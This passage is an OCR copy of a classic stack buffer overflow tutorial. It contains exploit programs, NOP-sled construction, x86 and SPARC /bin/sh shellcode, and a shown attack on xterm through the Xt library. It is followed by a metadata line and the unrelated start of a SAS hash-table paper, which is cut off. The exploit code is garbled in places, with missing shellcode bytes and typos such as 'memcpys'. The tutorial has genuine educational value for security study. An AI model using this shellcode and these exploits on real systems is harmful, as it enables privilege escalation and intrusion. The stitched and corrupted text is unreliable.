do not push more than a few hundred or a few thousand bytes into the stack at any one time. Therefore by knowing where the stack starts we can try to guess where the buffer we are trying to overflow will be. Here is a little program that will print its stack pointer: ``` sp.c unsigned long get_sp(void) { __asm__("movl %esp,%eax"); } void main() { printf("0x%x\n", get_sp()); } ``` ``` [aleph1]$ ./sp 0x8000470 [aleph1]$ ``` Lets assume this is the program we are trying to overflow is: ``` vulnerable.c void main(int argc, char *argv[]) { char buffer[512]; if (argc > 1) strcpy(buffer, argv[1]); } ``` We can create a program that takes as a parameter a buffer size, and an offset from its own stack pointer (where we believe the buffer we want to overflow may live). We'll put the overflow string in an environment variable so it is easy to manipulate: ``` exploit2.c #include <stdlib.h> #define DEFAULT_OFFSET 0 #define DEFAULT_BUFFER_SIZE 512 char shellcode[] = ``` unsigned long get_sp(void) { __asm__("movl %esp,%eax"); } void main(int argc, char *argv[]) { char *buff, *ptr; long *addr_ptr, addr; int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE; int i; if (argc > 1) bsize = atoi(argv[1]); if (argc > 2) offset = atoi(argv[2]); if (! (buff = malloc(bsize))) { printf("Can't allocate memory.\n"); exit(0); } addr = get_sp() - offset; printf("Using address: 0x%x\n", addr); ptr = buff; addr_ptr = (long *) ptr; for (i = 0; i < bsize; i+=4) *(addr_ptr++) = addr; ptr += 4; for (i = 0; i < strlen(shellcode); i++) *(ptr++) = shellcode[i]; buff[bsize - 1] = '\0'; memcpy(buff,"EGG=",4); putenv(buff); system("/bin/bash"); } Now we can try to guess what the buffer and offset should be: [aleph1]$ ./exploit2 500 Using address: 0xbfffffd4 [aleph1]$ ./vulnerable $EGG [aleph1]$ exit [aleph1]$ ./exploit2 600 Using address: 0xbfffffd4 [aleph1]$ ./vulnerable $EGG Illegal instruction [aleph1]$ exit [aleph1]$ ./exploit2 600 100 As we can see this is not an efficient process. Trying to guess the offset even while knowing where the beginning of the stack lives is nearly impossible. We would need at best a hundred tries, and at worst a couple of thousand. The problem is we need to guess *exactly* where the address of our code will start. If we are off by one byte more or less we will just get a segmentation violation or a invalid instruction. One way to increase our chances is to pad the front of our overflow buffer with NOP instructions. Almost all processors have a NOP instruction that performs a null operation. It is usually used to delay execution for purposes of timing. We will take advantage of it and fill half of our overflow buffer with them. We will place our shellcode at the center, and then follow it with the return addresses. If we are lucky and the return address points anywhere in the string of NOPs, they will just get executed until they reach our code. In the Intel architecture the NOP instruction is one byte long and it translates to 0x90 in machine code. Assuming the stack starts at address 0xFF, that S stands for shell code, and that N stands for a NOP instruction the new stack would look like this: ``` <------ [NNNNNNNNNNNNSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS][0xDE][0xDE][0xDE][0xDE][0xDE] ^ | |_____________________| ``` The new exploits is then: ``` #include <stdlib.h> #define DEFAULT_OFFSET 0 #define DEFAULT_BUFFER_SIZE 512 #define NOP 0x90 ``` char shellcode[] = "\xe8\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe0\xdc\xff\xff\xff/bin/sh"; unsigned long get_sp(void) { __asm__("movl %esp,%eax"); } void main(int argc, char *argv[]) { char *buff, *ptr; long *addr_ptr, addr; int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE; int i; if (argc > 1) bsize = atoi(argv[1]); if (argc > 2) offset = atoi(argv[2]); if (!(buff = malloc(bsize))) { printf("Can't allocate memory.\n"); exit(0); } addr = get_sp() - offset; printf("Using address: 0x%x\n", addr); ptr = buff; addr_ptr = (long *) ptr; for (i = 0; i < bsize; i+=4) *(addr_ptr++) = addr; for (i = 0; i < bsize/2; i++) buff[i] = NOP; ptr = buff + ((bsize/2) - (strlen(shellcode)/2)); for (i = 0; i < strlen(shellcode); i++) *(ptr++) = shellcode[i]; buff[bsize - 1] = '\0'; memcpy(buff,"EGG=".4); putenv(buff); system("/bin/bash"); } A good selection for our buffer size is about 100 bytes more than the size of the buffer we are trying to overflow. This will place our code at the end of the buffer we are trying to overflow, giving a lot of space for the NOPs, but still overwriting the return address with the address we guessed. The buffer we are trying to overflow is 512 bytes long, so we'll use 612. Let's try to overflow our test program with our new exploit: [aleph1]$ ./exploit3 612 http://reactor-core.org/stack-smashing.html Page 21 of 32 Whoa! First try! This change has improved our chances a hundredfold. Let's try it now on a real case of a buffer overflow. We'll use for our demonstration the buffer overflow on the Xt library. For our example, we'll use xterm (all programs linked with the Xt library are vulnerable). You must be running an X server and allow connections to it from the localhost. Set your DISPLAY variable accordingly. [aleph1]$ export DISPLAY=:0.0 [aleph1]$ ./exploit3 1124 Using address: 0xbffffd48 [aleph1]$ /usr/X11R6/bin/xterm -fg $EGG Warning: Color name "â^1=FF ^C [aleph1]$ exit [aleph1]$ ./exploit3 2148 100 Using address: 0xbffffd48 [aleph1]$ /usr/X11R6/bin/xterm -fg $EGG Warning: Color name "â^1=FF ^C [aleph1]$ exit Warning: some arguments in previous message were lost Illegal instruction [a4]$ exit . . [a4]$ ./exploit4 2148 600 Using address: 0xbffffb54 [a4]$ /usr/X11R6/bin/xterm -fg $EGG Warning: Color name "ë^1¤FF 0V =a@=eUyy/bin/sh@y@Tqy@Tqy@Tqy@Tqy@Tqy@Tqy@Tqy@Tqy@Tqy@Tqy@Tqy@Tqy@Tqy@Tqy@Tqy@Tqy@Tqy@Tqy@Tqy@Tqy@Tqy@Tqy@Tqy@Tqy@Tqy@Tqy@Tqy@Tqy@Tqy@Tqy@Tqy@Tqy@Tqy@Tqy@Tqy@Tqy@Tqy@Tqy@Tqy@Tqy@Tqy@Tqy@Tqy@Tqy@Tqy@Tqy@Tqy@Tqy@Tqy@Tqy@Tqy@Tqy@Tqy@Tqy@Tqy@Tqy@Tqy@Tqy@Tqy@Tqy@Tqy@Tqy@Tqy@Tqy@Tqy@Tqy@Tqy@Tqy@Tqy@Tqy@Tqy@Tqy@Tqy@Tqy@Tqy@Tqy@Tqy@Tqy@Tqy@Tqy@Tqy@Tqy@Tqy@Tqy@Tqy@Tqy@Tqy@Tqy@Tqy@Tqy@Tqy@Tqy@Tqy@Tqy@Tqy@Tqy@Tqy@Tqy@Tqy@Tqy@Tqy@Tqy@Tqy@Tqy@Tqy@Tqy@Tqy@Tqy@Tqy@Tqy@Tqy@Tqy@Tqy@Tqy@Tqy@Tqy@Tqy@Tqy@Tqy@Tqy@Tqy@Tqy@Tqy@Tqy@Tqy@Tqy@Tqy@Tqy@Tqy@Tqy@Tqy@Tqy@Tqy@Tqy@Tqy@Tqy@Tqy@Tqy@Tqy@Tqy@Tqy@Tqy@Tqy@Tqy@Tqy@ Eureka! Less than a dozen tries and we found the magic numbers. If xterm were installed suid root this would now be a root shell. **SMALL BUFFER OVERFLOWS** There will be times when the buffer you are trying to overflow is so small that either the shellcode won't fit into it, and it will overwrite the return address with instructions instead of the address of our code, or the number of NOPs you can pad the front of the string with is so small that the chances of guessing their address is minuscule. To obtain a shell from these programs we will have to go about it another way. This particular approach only works when you have access to the program's environment variables. What we will do is place our shellcode in an environment variable, and then overflow the buffer with the address of this variable in memory. This method also increases your changes of the exploit working as you can make the environment variable holding the shell code as large as you want. The environment variables are stored in the top of the stack when the program is started, any modification by setenv() are then allocated elsewhere. The stack at the beginning then looks like this: ``` <strings><argv pointers>NULL<envp pointers>NULL<argc><argv><envp> ``` Our new program will take an extra variable, the size of the variable containing the shellcode and NOPs. Our new exploit now looks like this: ```c #include <stdlib.h> #define DEFAULT_OFFSET 0 #define DEFAULT_BUFFER_SIZE 512 #define DEFAULT_EGG_SIZE 2048 #define NOP 0x90 char shellcode[] = "\xeb\x1f\x5e\x89\x76\x08\xc0\x88\x46\x07\x89\x46\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\xe8\x0f\xff\xff\xff/bin/sh" unsigned long get_esp(void) { __asm__("movl %esp,%eax"); } void main(int argc, char *argv[]) { char *buff, *ptr, *egg; long *addr_ptr, addr; int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE; int i, eggsize=DEFAULT_EGG_SIZE; if (argc > 1) bsize = atoi(argv[1]); if (argc > 2) offset = atoi(argv[2]); if (argc > 3) eggsize = atoi(argv[3]); if (!(buff = malloc(bsize))) { printf("Can't allocate memory.\n"); exit(0); } if (!(egg = malloc(eggsize))) { printf("Can't allocate memory.\n"); exit(0); } addr = get_esp() - offset; printf("Using address: 0x%x\n", addr); ptr = buff; addr_ptr = (long *) ptr; for (i = 0; i < bsize; i+=4) *(addr_ptr++) = addr; ptr = egg; for (i = 0; i < eggsize - strlen(shellcode) - 1; i++) *(ptr++) = NOP; for (i = 0; i < strlen(shellcode); i++) *(ptr++) = shellcode[i]; ``` buff[bsize - 1] = '\0'; egg[eggsze - 1] = '\0'; memcpys(egg,"EGG=", 4); putenv(egg); memcpys(buff,"RET=", 4); putenv(buff); system("/bin/bash"); } --------------------------------------------------- --------------------------- Lets try our new exploit with our vulnerable test program: [aleph1]$ ./exploit4 768 Using address: 0xbfffffd0 [aleph1]$ ./vulnerable $RET $ --------------------------------------------------- --------------------------- Works like a charm. Now lets try it on xterm: [aleph1]$ export DISPLAY=:0.0 [aleph1]$ ./exploit4 2148 Using address: 0xbfffffd0 [aleph1]$ /usr/X11R6/bin/xterm -fg $RET Warning: Color name http://reactor-core.org/stack-smashing.html Warning: some arguments in previous message were lost On the first try! It has certainly increased our odds. Depending how much environment data the exploit program has compared with the program you are trying to exploit the guessed address may be to low or to high. Experiment both with positive and negative offsets. FINDING BUFFER OVERFLOWs As stated earlier, buffer overflows are the result of stuffing more information into a buffer than it is meant to hold. Since C does not have any built-in bounds checking, overflows often manifest themselves as writing past the end of a character array. The standard C library provides a number of functions for copying or appending strings, that perform no boundary checking. They include: strcat(), strcpy(), sprintf(), and vsprintf(). These functions operate on null-terminated strings, and do not check for overflow of the receiving string. gets() is a function that reads a line from stdin into a buffer until either a terminating newline or EOF. It performs no checks for buffer overflows. The scanf() family of functions can also be a problem if you are matching a sequence of non-white-space characters (%s), or matching a non-empty sequence of characters from a specified set (%[]), and the array pointed to by the char pointer, is not large enough to accept the whole sequence of characters, and you have not defined the optional maximum field width. If the target of any of these functions is a buffer of static size, and its other argument was somehow derived from user input there is a good possibility that you might be able to exploit a buffer overflow. Another usual programming construct we find is the use of a while loop to read one character at a time into a buffer from stdin or some file until the end of line, end of file, or some other delimiter is reached. This type of construct usually uses one of these functions: getc(), fgetc(), or getchar(). If there is no explicit checks for overflows in the while loop, such programs are easily exploited. To conclude, grep(1) is your friend. The sources for free operating systems and their utilities is readily available. This fact becomes quite interesting once you realize that many commercial operating systems utilities where derived from the same sources as the free ones. Use the source d00d. APPENDIX A - SHELLCODE FOR DIFFERENT OPERATING SYSTEMS/ARCHITECTURES i386/Linux ```assembly jmp 0x1f popl %esi movl %esi, 0x8(%esi) xorl %eax, %eax movb %eax, 0x7(%esi) movl %eax, 0xc(%esi) movb $0xb, %al movl %esi, %ebx leal 0x8(%esi), %ecx leal 0xc(%esi), %edx int $0x80 xorl %ebx, %ebx movl %ebx, %eax inc %eax int $0x80 call -0x24 .string "/bin/sh" ``` SPARC/Solaris ```assembly sethi 0xbd89a, %l6 or %l6, 0x16e, %l6 sethi 0xbdcda, %l7 and %sp, %sp, %o0 add %sp, 8, %o1 xor %o2, %o2, %o2 add %sp, 16, %sp std %l6, [%sp - 16] st %sp, [%sp - 8] st %g0, [%sp - 4] mov 0x3b, %gl ta 8 xor %o7, %o7, %o0 mov 1, %gl ta 8 ``` SPARC/SunOS ```assembly sethi 0xbd89a, %l6 or %l6, 0x16e, %l6 sethi 0xbdcda, %l7 and %sp, %sp, %o0 add %sp, 8, %o1 xor %o2, %o2, %o2 add %sp, 16, %sp std %l6, [%sp - 16] st %sp, [%sp - 8] st %g0, [%sp - 4] mov 0x3b, %gl mov -0x1, %l5 ``` APPENDIX B - GENERIC BUFFER OVERFLOW PROGRAM shellcode.h ``` #ifndef _NOPE_SIZE #define _NOPE_SIZE 1 #else #define _NOPE_SIZE 4 #endif unsigned long get_sp(void) { __asm__ ("movl %esp, %eax"); } ``` ```c #stdio defined(__sparc__) && defined(__sun__) && defined(__svr4__) && defined(__sparc__) && defined(__sun__) unsigned long get_sp(void) { __asm__ ("or %sp, %sp, %i0"); } ``` ``` #endif ``` http://reactor-core.org/stack-smashing.html eggshell.c /********************************************************** * eggshell v1.0 * Aleph One / aleph1@underground.org **********************************************************/ #include <stdlib.h> #include <stdio.h> #include "shellcode.h" #define DEFAULT_OFFSET 0 #define DEFAULT_BUFFER_SIZE 512 #define DEFAULT_EGG_SIZE 2048 void usage(void); void main(int argc, char *argv[]) { char *ptr, *bof, *egg; long *addr_ptr, addr; int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE; int i, n, m, c, align=0, eggsize=DEFAULT_EGG_SIZE; while ((c = getopt(argc, argv, "a:b:e:o:")) != EOF) switch (c) { case 'a': align = atoi(optarg); break; case 'b': bsize = atoi(optarg); break; case 'e': eggsize = atoi(optarg); break; case 'o': offset = atoi(optarg); break; case '?': usage(); exit(0); } if (strlen(shellcode) > eggsize) { printf("Shellcode is larger the the egg.\n"); exit(0); } if (!(bof = malloc(bsize))) { printf("Can't allocate memory.\n"); exit(0); } if (!(egg = malloc(eggsize))) { printf("Can't allocate memory.\n"); exit(0); } } addr = get_sp() - offset; printf("[ Buffer size:\t%d\t\tEgg size:\t%d\t Aligment:\t%d\t]\n", bsize, eggsize, align); printf("[ Address:\t0x%x\t Offset:\t%d\t]\n", addr, offset); addr_ptr = (long *) bof; for (i = 0; i < bsize; i+=4) *(addr_ptr++) = addr; ptr = egg; for (i = 0; i <= eggsize - strlen(shellcode) - NOP_SIZE; i += NOP_SIZE) for (n = 0; n < NOP_SIZE; n++) { m = (n + align) % NOP_SIZE; *(ptr++) = nop[m]; } for (i = 0; i < strlen(shellcode); i++) *(ptr++) = shellcode[i]; bof[bsize - 1] = '\0'; egg[eggsize - 1] = '\0'; memcpy(egg,"EGG=",4); putenv(egg); memcpy(bof,"BOF=",4); putenv(bof); system("/bin/sh"); void usage(void) { (void)fprintf(stderr, "usage: eggshell [-a <alignment>] [-b <buffersize>] [-e <eggsize>] [-o <offset> =============================================================================== [Back to the Reactor Core] Verily I say unto you, Inasmuch as ye have done it unto one of the least of these my brethren, ye have done it unto me. (Matthew 25:40) This document is provided for reference purposes only. Statements in this document reflect the opinions of Reactor Core staff or the owner. If you find ought to disagree that is as it ought be. Train your mind to test every thought, ideology, train of reason and claim to truth. There is no justice when even a single voice goes unheard. Thessalonians 5:21, 1 John 4:1-3, John 14:26, John 16:26, Revelation 12:10, Proverbs 14:15, Proverbs 18:13) Ad Dei Gloriam http://reactor-core.org/stack-smashing.html 28-Nov-06
{"Source-Url": "http://cs.gmu.edu/~astavrou/courses/ISA_564_F16/Week%202_3_Buffer_Overflows/Smashing.pdf", "len_cl100k_base": 13214, "olmocr-version": "0.1.53", "pdf-total-pages": 32, "total-fallback-pages": 0, "total-input-tokens": 71249, "total-output-tokens": 15601, "length": "2e13", "weborganizer": {"__label__adult": 0.00032830238342285156, "__label__art_design": 0.00029969215393066406, "__label__crime_law": 0.00027871131896972656, "__label__education_jobs": 0.00024890899658203125, "__label__entertainment": 7.12275505065918e-05, "__label__fashion_beauty": 9.739398956298828e-05, "__label__finance_business": 0.0001246929168701172, "__label__food_dining": 0.00028395652770996094, "__label__games": 0.0007791519165039062, "__label__hardware": 0.0022144317626953125, "__label__health": 0.0001962184906005859, "__label__history": 0.0001666545867919922, "__label__home_hobbies": 0.00010448694229125977, "__label__industrial": 0.0003864765167236328, "__label__literature": 0.0002474784851074219, "__label__politics": 0.0001709461212158203, "__label__religion": 0.0006785392761230469, "__label__science_tech": 0.014190673828125, "__label__social_life": 5.340576171875e-05, "__label__software": 0.00865936279296875, "__label__software_dev": 0.9697265625, "__label__sports_fitness": 0.00019407272338867188, "__label__transportation": 0.0002999305725097656, "__label__travel": 0.00013828277587890625}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 45114, 0.05645]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 45114, 0.54601]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 45114, 0.80793]], "google_gemma-3-12b-it_contains_pii": [[0, 2489, false], [2489, 4168, null], [4168, 7190, null], [7190, 8895, null], [8895, 10148, null], [10148, 12098, null], [12098, 14534, null], [14534, 15707, null], [15707, 16556, null], [16556, 18069, null], [18069, 19878, null], [19878, 21334, null], [21334, 23504, null], [23504, 25005, null], [25005, 25361, null], [25361, 26780, null], [26780, 27938, null], [27938, 29524, null], [29524, 30607, null], [30607, 32150, null], [32150, 33751, null], [33751, 34474, null], [34474, 35285, null], [35285, 36532, null], [36532, 38003, null], [38003, 38689, null], [38689, 38689, null], [38689, 41044, null], [41044, 41873, null], [41873, 42325, null], [42325, 43533, null], [43533, 45114, null]], "google_gemma-3-12b-it_is_public_document": [[0, 2489, true], [2489, 4168, null], [4168, 7190, null], [7190, 8895, null], [8895, 10148, null], [10148, 12098, null], [12098, 14534, null], [14534, 15707, null], [15707, 16556, null], [16556, 18069, null], [18069, 19878, null], [19878, 21334, null], [21334, 23504, null], [23504, 25005, null], [25005, 25361, null], [25361, 26780, null], [26780, 27938, null], [27938, 29524, null], [29524, 30607, null], [30607, 32150, null], [32150, 33751, null], [33751, 34474, null], [34474, 35285, null], [35285, 36532, null], [36532, 38003, null], [38003, 38689, null], [38689, 38689, null], [38689, 41044, null], [41044, 41873, null], [41873, 42325, null], [42325, 43533, null], [43533, 45114, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 45114, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 45114, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 45114, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 45114, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 45114, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 45114, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 45114, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 45114, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 45114, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 45114, null]], "pdf_page_numbers": [[0, 2489, 1], [2489, 4168, 2], [4168, 7190, 3], [7190, 8895, 4], [8895, 10148, 5], [10148, 12098, 6], [12098, 14534, 7], [14534, 15707, 8], [15707, 16556, 9], [16556, 18069, 10], [18069, 19878, 11], [19878, 21334, 12], [21334, 23504, 13], [23504, 25005, 14], [25005, 25361, 15], [25361, 26780, 16], [26780, 27938, 17], [27938, 29524, 18], [29524, 30607, 19], [30607, 32150, 20], [32150, 33751, 21], [33751, 34474, 22], [34474, 35285, 23], [35285, 36532, 24], [36532, 38003, 25], [38003, 38689, 26], [38689, 38689, 27], [38689, 41044, 28], [41044, 41873, 29], [41873, 42325, 30], [42325, 43533, 31], [43533, 45114, 32]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 45114, 0.00854]]}
olmocr_science_pdfs
2024-12-07
2024-12-07
85c7b36b767d5216c5d5deb80847429ea1e50ee7
How Do I Love Hash Tables? Let Me Count The Ways! Judy Loren, Health Dialog Analytic Solutions, Portland, ME ABSTRACT I love hash tables. You will, too, after you see what they can do. This paper will start with the classic 2 table join. Nothing new, you say? But this version does it in one step without sorting. And, it's the fastest method around. Next, you will see the use of hash tables to join multiple datasets on different keys in one pass, again with no sorting. How about unlimited recursive chained lookups (like when you need to update an ID through as many incarnations as it may have had)? Hash tables solve that one, too. And before you catch your breath, you'll see how to create n datasets from one (or more), where n is determined (at runtime) by the number of values encountered in a variable. No muss, no fuss. One step (well, OK, this one does require a prior sort) and you're done. We'll wind up with an outer join, just to show that hash tables can do that, too. Take a look at what they can deliver, and you'll be counting the ways you love hash tables before the year is out. INTRODUCTION This paper is not a reference document on hash tables, nor an explanation of how they work. Both of those have been done better than I could do them by experts in the field (see References for a paper on the subject by Paul Dorfman). This paper is more of an homage to Paul and to the power of hash tables. It shows a variety of situations, fairly common among data processors, in which hash tables are an excellent, if not the best, solution. That said, people who learn best by example will find this paper a good training tool. If you can identify with at least one of the specific examples, and begin to apply it in your work, you will have a basis for understanding the theoretical underpinnings of the technique and can then expand your usage to other applications. WHAT ARE HASH TABLES? For those who want it straight from the horse’s mouth, here is a blurb from the SAS online documentation: SAS now provides two pre-defined component objects for use in a DATA step: the hash object and the hash iterator object. These objects enable you to quickly and efficiently store, search, and retrieve data based on lookup keys. The DATA step component object interface enables you to create and manipulate these component objects by using statements, attributes, and methods. You use the DATA step object dot notation to access the component object's attributes and methods. The hash and hash iterator objects have one attribute, fourteen methods, and two statements associated with them. See DATA Step Object Attributes and Methods. Search the online documentation for the phrase “DATA Step Object Attributes and Methods” for the rest of the story. Briefly, hash tables, much like arrays, are Data step constructs. A hash table is declared and used within one Data step, and it disappears when the Data step completes. Also like arrays, hash tables are accessed via an index. But unlike arrays, the index consists of a lookup key defined by the user rather than a simple sequential variable. Also, one hash table can contain multiple data elements (a bit like a series of arrays). Because the lookup keys are based on the values themselves access is extremely efficient. SAS does the work of building this efficiency so the user does not have to code anything other than identifying the key fields to use. Hash tables are objects, so you call methods to use them. The syntax of calling a method is to put the name of the hash table, then a dot (.), then the method you want to use. Following the method is a set of parentheses in which you put the specifications for the method. You will see this kind of syntax in the statement below: \texttt{plan}\texttt{.}\texttt{DefineKey}('plan_id'); In this case, Plan is the name of the hash table. DefineKey is the method and ‘plan_id’ is a specification expected by the method DefineKey (analogous to a positional parameter on a macro call). A method can be called using the following expanded syntax: rc = plan.definekey('plan_id); In this case, the variable rc is specified by the user to contain the feedback from executing the method. If the instruction plan.definekey('plan_id') executes successfully, rc will contain a value of zero. If not, the value of rc will be something other than zero. A note about the term associativearray: While it can be used to declare a hash table, it will not work with the iterator. Not all hash applications require an iterator, but since the term “hash” is shorter to type and works with the iterator, it seems like a good idea to get in the habit of using it instead. Now, without further ado, on to the first example. EXAMPLE 1: JOIN 2 DATASETS (WITHOUT SORTING) Imagine that you have 2 datasets and you need to join them on a key. Let us consider the following case: <table> <thead> <tr> <th>Member_id</th> <th>Plan_id</th> <th>Plan_id</th> <th>Plan_desc</th> </tr> </thead> <tbody> <tr> <td>164-234</td> <td>XYZ</td> <td>XYZ</td> <td>HMO Salaried</td> </tr> <tr> <td>297-123</td> <td>ABC</td> <td>ABC</td> <td>PPO Hourly</td> </tr> <tr> <td>344-123</td> <td>JKL</td> <td>JKL</td> <td>HMO Executive</td> </tr> <tr> <td>395-123</td> <td>XYZ</td> <td>JKL</td> <td>HMO Executive</td> </tr> <tr> <td>495-987</td> <td>ABC</td> <td>JKL</td> <td>HMO Executive</td> </tr> <tr> <td>562-987</td> <td>ABC</td> <td>JKL</td> <td>HMO Executive</td> </tr> <tr> <td>697-123</td> <td>XYZ</td> <td>JKL</td> <td>HMO Executive</td> </tr> <tr> <td>833-144</td> <td>JKL</td> <td>JKL</td> <td>HMO Executive</td> </tr> <tr> <td>987-123</td> <td>ABC</td> <td>JKL</td> <td>HMO Executive</td> </tr> </tbody> </table> You are faced with the straightforward task of adding the Plan_desc to the Members dataset by matching the values in the column Plan_ID on the Members table to the Plan_ID on the Plans table. Before hash tables, you might have used a proc sort and a data step. This would involve sorting the Members dataset, which might be very large, on a variable that is unlikely to be the desired final sort key—a waste of time and resources. There are other solutions (see Loren, 2005) but the purpose of this paper is to introduce you to hash tables in a simple setting. This example does not highlight the reason for using hash tables but it does show how to use them. APPROACH As shown in the code below, we accomplish the task in one Data step. First we load the data from the Plans dataset into a hash table. We then process the Members data (in whatever order we happen to find it), looking up the value for the Plan_desc variable from the hash table for each record. The .find() method with no modifier uses the current value of the key variable Plan_id in the program data vector to identify the desired row in the hash table. It then puts the values of the field(s) listed in the .DefineData() method (in this case, Plan_desc) from the identified row in the hash table into the variable(s) of the same name (Plan_desc) in the program data vector, making it available for output. When we output the record to the dataset called Both, it will contain all the variables from the Members dataset plus the Plan_desc. A note on error handling: In the code below, you see that we are initializing Plan_desc to missing immediately before attempting to read the hash table to pull in the Plan_desc for the current value of Plan_id. The purpose of this is to prepare for the case where the value of Plan_id from the members table does not exist in the dataset plans, and therefore will not be found on any row of the hash table. There are other methods of detecting and handling this that will be introduced below. Here we assume that the user wants all records from members in the dataset both, even if the value of Plan_id does not exist in the dataset Plans, but in that case, the user wants the Plan_desc to be missing. Here is the code: data both(drop=rc); declare Hash Plan (); /* declare the name Plan for hash */ rc = plan.DefineKey ('Plan_id'); /* identify fields to use as keys */ rc = plan.DefineData ('Plan_desc'); /* identify fields to use as data */ rc = plan.DefineDone (); /* complete hash table definition */ do until (eof1) ; set plans end = eof1; rc = plan.add (); end; do until (eof2) ; set members end = eof2; call missing(Plan_desc); /* initialize the variable we intend to fill */ rc = plan.find (); output; end; stop; run; The resulting dataset looks like this: <table> <thead> <tr> <th>Obs</th> <th>Plan_id</th> <th>Plan_desc</th> <th>Member_id</th> </tr> </thead> <tbody> <tr> <td>1</td> <td>XYZ</td> <td>HMO</td> <td>164-234</td> </tr> <tr> <td>2</td> <td>ABC</td> <td>PPO</td> <td>297-123</td> </tr> <tr> <td>3</td> <td>JKL</td> <td>HMO</td> <td>344-123</td> </tr> <tr> <td>4</td> <td>XYZ</td> <td>HMO</td> <td>395-123</td> </tr> <tr> <td>5</td> <td>ABC</td> <td>PPO</td> <td>495-987</td> </tr> <tr> <td>6</td> <td>ABC</td> <td>PPO</td> <td>562-987</td> </tr> <tr> <td>7</td> <td>XYZ</td> <td>HMO</td> <td>697-123</td> </tr> <tr> <td>8</td> <td>JKL</td> <td>HMO</td> <td>833-144</td> </tr> <tr> <td>9</td> <td>ABC</td> <td>PPO</td> <td>987-123</td> </tr> </tbody> </table> **EXAMPLE 2A: JOIN 3 DATASETS (WITHOUT SORTING, ONE STEP)** The second example is an enhancement of the first. It involves adding a second field to the Members dataset based on a different key. In the first example we needed to pick up Plan_desc based on the value of Plan_id. Hash tables allowed us to avoid sorting the large Members dataset. Since we don’t have to sort to accomplish a join, why not do more than one at a time? Let’s add a lookup on Group_id to Group_name. <table> <thead> <tr> <th>Members</th> <th>Groups</th> </tr> </thead> <tbody> <tr> <td>Member_id</td> <td>Plan_id</td> </tr> <tr> <td>164-234</td> <td>XYZ</td> </tr> <tr> <td>297-123</td> <td>ABC</td> </tr> <tr> <td>344-123</td> <td>JKL</td> </tr> <tr> <td>395-123</td> <td>XYZ</td> </tr> <tr> <td>495-987</td> <td>ABC</td> </tr> <tr> <td>562-987</td> <td>ABC</td> </tr> <tr> <td>697-123</td> <td>XYZ</td> </tr> </tbody> </table> Now our Members table starts with 3 variables, and we need to add 2 more (Plan_desc, as in Example 1, and Group_name). **APPROACH** We will modify the code shown for Example 1 to create a second hash table in the same Data step, and look up 2 values for each record in the Members dataset. In the code below, the old code is shown in plain font; the additions to accomplish the second join are in **bold**. ```plaintext data all (drop=rc); declare hash Plan (); /* same as Example 1 */ rc = plan.DefineKey ('Plan_id'); rc = plan.DefineData ('Plan_desc'); rc = plan.DefineDone (); declare hash Group (); /* similar code, 2nd table */ rc = group.DefineKey ('Group_id'); rc = group.DefineData ('Group_name'); rc = group.DefineDone (); do until (eof1) ; /* same as Example 1 */ set plans end = eof1; rc = plan.add (); end; do until (eof2) ; /* similar code, 2nd table */ set groups end = eof2; rc = group.add (); end; do until (eof3) ; set members end = eof3; call missing(Plan_desc); /* initialize both lookups*/ rc = plan.find (); /* same as Example 1 */ call missing(Group_name); /* initialize both lookups*/ rc = group.find (); /* similar code, 2nd table */ output; end; stop; run; ``` The resulting dataset looks like this: <table> <thead> <tr> <th>Obs</th> <th>Member_id</th> <th>Plan_id</th> <th>Plan_desc</th> <th>Group</th> <th>Group_name</th> </tr> </thead> <tbody> <tr> <td>1</td> <td>164-234</td> <td>XYZ</td> <td>HMO Salaried</td> <td>G123</td> <td>Umbrellas, Inc.</td> </tr> <tr> <td>2</td> <td>297-123</td> <td>ABC</td> <td>PPO Hourly</td> <td>G123</td> <td>Umbrellas, Inc.</td> </tr> <tr> <td>3</td> <td>344-123</td> <td>JKL</td> <td>HMO Executive</td> <td>G456</td> <td>Toy Company</td> </tr> <tr> <td>4</td> <td>395-123</td> <td>XYZ</td> <td>HMO Salaried</td> <td>G123</td> <td>Umbrellas, Inc.</td> </tr> <tr> <td>5</td> <td>495-987</td> <td>ABC</td> <td>PPO Hourly</td> <td>G456</td> <td>Toy Company</td> </tr> <tr> <td>6</td> <td>562-987</td> <td>ABC</td> <td>PPO Hourly</td> <td>G123</td> <td>Umbrellas, Inc.</td> </tr> <tr> <td>7</td> <td>697-123</td> <td>XYZ</td> <td>HMO Salaried</td> <td>G456</td> <td>Toy Company</td> </tr> </tbody> </table> **EXAMPLE 2B: JOIN ON 2 LEVELS OF SPECIFICITY** Conditional joins are a special case of the 3 dataset example. In a conditional join you want to merge a record from one dataset with a record from one of two other datasets depending on a condition. The example we will use here is joining demographic summary data to an individual record based on zip code, where the zip code might be 5 digits or 9 digits long. U.S. zip codes at the 9-digit level are 